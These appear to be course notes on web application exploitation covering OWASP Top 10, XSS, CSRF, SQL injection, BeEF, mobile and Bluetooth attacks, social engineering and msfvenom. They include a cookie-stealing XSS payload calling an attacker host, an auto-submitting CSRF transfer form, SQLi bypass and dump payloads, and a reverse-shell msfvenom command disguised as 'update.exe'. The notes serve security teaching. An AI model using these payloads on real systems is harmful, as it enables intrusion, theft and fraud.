Back to Subject

Unit 4 - Notes

INT245 8 min read

Unit 4: Web Application Exploitation

1. OWASP Top 10 Vulnerabilities

The Open Web Application Security Project (OWASP) Top 10 represents a broad consensus on the most critical security risks to web applications.

The Current Landscape (Key Categories)

  1. Broken Access Control: Failures in enforcing restrictions on what authenticated users can do. Attackers act as users or admins, accessing unauthorized data.
  2. Cryptographic Failures: Previously "Sensitive Data Exposure." Involves weak encryption, transmitting data in clear text (HTTP vs HTTPS), or using weak algorithms (e.g., MD5).
  3. Injection: Occurs when untrusted data is sent to an interpreter as part of a command or query. Includes SQL, NoSQL, OS command injection, and LDAP injection.
  4. Insecure Design: Focuses on risks related to design flaws and architectural structures rather than implementation errors. (e.g., failing to rate-limit login attempts).
  5. Security Misconfiguration: The most common issue. Includes default accounts/passwords, unnecessary features enabled, error messages containing sensitive info, and misconfigured HTTP headers.
  6. Vulnerable and Outdated Components: Using libraries, frameworks, or software modules with known vulnerabilities (CVEs).
  7. Identification and Authentication Failures: Weaknesses in session management, credential stuffing, or allowing weak passwords.
  8. Software and Data Integrity Failures: Code and infrastructure that does not protect against integrity violations (e.g., insecure deserialization, pulling plugins from untrusted sources).
  9. Security Logging and Monitoring Failures: Insufficient logging and detection prevent the organization from detecting active breaches.
  10. Server-Side Request Forgery (SSRF): Web applications fetching a remote resource without validating the user-supplied URL, allowing attackers to coerce the application to send requests to unexpected destinations (internal networks).

2. Session Hijacking

Session hijacking involves an attacker taking control of a user's session after the user has successfully authenticated with a server.

Mechanisms

  • Session Sniffing: Using tools like Wireshark to capture Session IDs (usually in cookies) transmitted over unencrypted HTTP.
  • Session Fixation: The attacker sets a user's session ID to a known value before the user logs in. Once the user authenticates using that ID, the attacker enters using the same ID.
  • Cross-Site Scripting (XSS): Using JavaScript to steal document.cookie.

Countermeasures

  • Use HTTPS for all traffic to prevent sniffing.
  • Set the Secure and HttpOnly flags on cookies (prevents JavaScript access).
  • Regenerate Session IDs immediately after successful login.

3. Cross-Site Scripting (XSS) Attacks

XSS occurs when an application includes untrusted data in a web page without proper validation or escaping.

Types of XSS

  1. Stored XSS (Persistent): The malicious script is permanently stored on the target server (e.g., in a database, forum post, or comment field). Every user who views the page executes the script.
  2. Reflected XSS (Non-Persistent): The malicious script is reflected off the web server, such as in an error message or search result. The attack is delivered via a link containing the payload.
  3. DOM-based XSS: The vulnerability exists in the client-side code rather than the server-side code. The payload is executed by modifying the "Document Object Model" in the victim’s browser.

Example Payload

HTML
<script>
  // Sends the victim's cookies to the attacker's server
  window.location='http://attacker-site.com/steal.php?cookie='+document.cookie;
</script>

4. Crafting Request Forgery Attacks (CSRF)

Cross-Site Request Forgery (CSRF or XSRF) forces an end user to execute unwanted actions on a web application in which they are currently authenticated.

The Attack Logic

  1. The victim logs into a legitimate site (e.g., Bank.com).
  2. The victim visits a malicious site (Attacker.com) while the session is still active.
  3. The malicious site contains a hidden form or image request that targets Bank.com.
  4. The browser sends the request to Bank.com including the victim's session cookies.

Crafting a CSRF Payload

HTML embedded on the attacker's site:

HTML
<!-- Hidden frame invisible to user -->
<iframe style="display:none" name="csrf-frame"></iframe>
<form method="POST" action="https://bank.com/transfer" target="csrf-frame">
    <input type="hidden" name="toAccount" value="AttackerAccount">
    <input type="hidden" name="amount" value="1000">
    <input type="submit" value="Click Me"> 
</form>
<script>document.forms[0].submit();</script>

Prevention

  • Anti-CSRF Tokens: A unique, random token checked by the server for every state-changing request.
  • SameSite Cookie Attribute: Prevents the browser from sending cookies with cross-site requests.

5. SQL Injection (SQLi)

SQLi consists of the insertion of a SQL query via the input data from the client to the application.

Identifying SQLi Vulnerabilities

  • Error-Based Detection: Inputting single quotes (') or double quotes (") to break the query syntax. If the server returns a database error (e.g., "You have an error in your SQL syntax"), it is vulnerable.
  • Boolean-Based (Blind): Injecting AND 1=1 (True) vs AND 1=0 (False). If the page content changes based on the condition, it is vulnerable.
  • Time-Based (Blind): Injecting sleep commands (e.g., WAITFOR DELAY '0:0:5' in MSSQL or pg_sleep(5) in Postgres). If the response takes 5 seconds, injection is successful.

Common Exploitation Techniques

  1. Authentication Bypass:
    • Input: admin' --
    • Query becomes: SELECT * FROM users WHERE user = 'admin' --' AND pass = '...' (The rest is commented out).
  2. UNION-Based: Combining results of the original query with results of an injected query.
    • Payload: ' UNION SELECT username, password FROM users --

6. Exploiting Browsers

Browser exploitation focuses on vulnerabilities in the web browser software or plugins (Flash, Java, PDF readers) to execute code on the client machine.

The Browser Exploitation Framework (BeEF)

BeEF is a penetration testing tool that focuses on the web browser.

  • Hooking: The core concept. A "hook" is a JavaScript file (hook.js) hosted by the BeEF server.
  • Execution: Once a victim visits a page containing the hook, the browser connects back to the BeEF server (zombie browser).
  • Capabilities:
    • Port scanning the victim's internal network.
    • Keylogging.
    • Screenshotting.
    • Metasploit integration (Browser Autopwn).

7. Mobile Device Exploitation

Mobile Deployment Models

Understanding how devices are managed in an enterprise affects the attack surface.

  • BYOD (Bring Your Own Device): Employees use personal devices. High risk due to lack of control and mixing of personal/corporate data.
  • COPE (Corporate Owned, Personally Enabled): Company buys the device but allows personal use. Better security control but privacy concerns.
  • CYOD (Choose Your Own Device): Employees choose from a list of approved devices bought by the company.
  • COBO (Corporate Owned, Business Only): Strictest model. Device is locked down for work only.

Identifying Vulnerabilities in Mobile Apps

  • Static Analysis: Decompiling the APK (Android) or IPA (iOS) to view source code. Looking for hardcoded API keys, database credentials, or weak encryption logic.
  • Dynamic Analysis: Running the app in a simulator or rooted device and intercepting traffic using a proxy (like Burp Suite) to analyze API calls.

Common Mobile Attacks

  1. Reverse Engineering: Converting binary code back to source code to find logic flaws.
  2. Insecure Data Storage: Apps storing sensitive data (tokens, passwords) in plain text in SharedPreferences (Android) or plist (iOS).
  3. Side-Channel Attacks: Monitoring power consumption or electromagnetic emissions to deduce encryption keys.
  4. Platform Vulnerabilities: Exploiting the OS directly (e.g., Stagefright on Android).

8. Hacking Bluetooth Signals

Bluetooth vulnerabilities allow attackers to compromise devices in close proximity (approx. 10–100 meters).

Attack Types

  • Bluejacking: Sending unsolicited messages (vCards/images) to Bluetooth-enabled devices. Harmless but annoying; used for social engineering.
  • Bluesnarfing: Unauthorized access to information on a device through Bluetooth (contacts, calendars, emails, text messages).
  • Bluebugging: Taking total control of the device. The attacker can listen to calls, forward calls, and send messages without the owner's knowledge.
  • Blueborne: An airborne attack vector that spreads without pairing. It exploits stack buffer overflows to execute arbitrary code.

Tools

  • hcitool: Linux command-line utility to configure Bluetooth connections.
  • bluelog: A Bluetooth site survey tool to discover devices.

9. Social Engineering Attacks

Exploiting human psychology rather than technical vulnerabilities to gain access.

Techniques

  • Phishing: Sending fraudulent emails appearing to be from reputable sources to induce individuals to reveal personal information.
  • Spear Phishing: Highly targeted phishing aimed at specific individuals or companies.
  • Vishing (Voice Phishing): Using the telephone to scam the user into surrendering private information.
  • Smishing: Phishing via SMS.
  • Pretexting: Creating a fabricated scenario (the pretext) to obtain information (e.g., pretending to be IT support needing a password).
  • Tailgating/Piggybacking: Following an authorized person into a secure area without their knowledge or consent.
  • Baiting: Leaving malware-infected physical media (USB drives) in obvious places hoping victims will plug them in.

Social-Engineer Toolkit (SET)

An open-source Python-driven tool aimed at penetration testing via social engineering. It can automate the creation of phishing sites, payload generation, and mass emailing.

10. Exploiting with Malware

In penetration testing, malware is simulated to test endpoint defenses (Antivirus/EDR).

Components

  1. Payload: The malicious code that runs on the target (e.g., a reverse shell).
  2. Dropper: A program designed to install the malware (evades initial detection).
  3. Wrapper/Binder: Combines a malicious executable with a legitimate one (e.g., binding a trojan to calc.exe).
  4. Crypter/Packer: Encrypts or compresses the malware to obfuscate the signature and evade antivirus detection.

Generation (Metasploit/Msfvenom)

Testers often use msfvenom to create payloads.

  • Staged Payload: Small initial code (stager) connects back to the attacker to download the rest of the malware (e.g., windows/meterpreter/reverse_tcp).
  • Stageless Payload: Contains the full malware code in one file (e.g., windows/meterpreter_reverse_tcp).

Example Command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > update.exe

Previous
Unit 3
Next
Unit 5